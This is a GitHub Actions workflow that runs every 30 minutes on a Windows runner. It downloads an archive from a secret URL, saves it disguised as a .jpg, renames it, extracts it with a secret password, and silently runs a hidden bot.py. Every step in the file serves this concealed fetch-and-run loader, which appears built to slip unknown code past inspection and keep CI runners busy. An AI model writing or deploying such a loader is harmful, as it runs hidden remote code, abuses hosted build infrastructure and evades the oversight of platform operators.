name: Windows Worker

on:
  workflow_dispatch:
  schedule:
    - cron: "*/30 * * * *"

concurrency:
  group: worker
  cancel-in-progress: true

jobs:
  worker:
    runs-on: windows-latest
    timeout-minutes: 90

    steps:
      - uses: actions/checkout@v3

      - name: Setup Python
        uses: actions/setup-python@v5
        with:
          python-version: "3.10"

      - name: Prepare dependencies (silent)
        shell: powershell
        run: |
          choco install 7zip -y --no-progress > $null

      - name: Download package (jpg disguised)
        shell: powershell
        env:
          SRC_URL: ${{ secrets.LINK }}
        run: |
          $ProgressPreference = 'SilentlyContinue'
          Invoke-WebRequest -Uri "$Env:SRC_URL" -OutFile "p.jpg" > $null

      - name: Rename & extract package
        shell: powershell
        env:
          ARCHIVE_KEY: ${{ secrets.PASSWORD }}
        run: |
          Rename-Item p.jpg p.7z
          & "C:\Program Files\7-Zip\7z.exe" x p.7z -p"$Env:ARCHIVE_KEY" -oextracted -y > $null

      - name: Run worker (bot.py only)
        shell: powershell
        run: |
          $ErrorActionPreference = 'SilentlyContinue'

          $botPath = "extracted\bot.py"

          if (-Not (Test-Path $botPath)) { exit 0 }

          cmd /c "python `"$botPath`" > nul 2>&1"
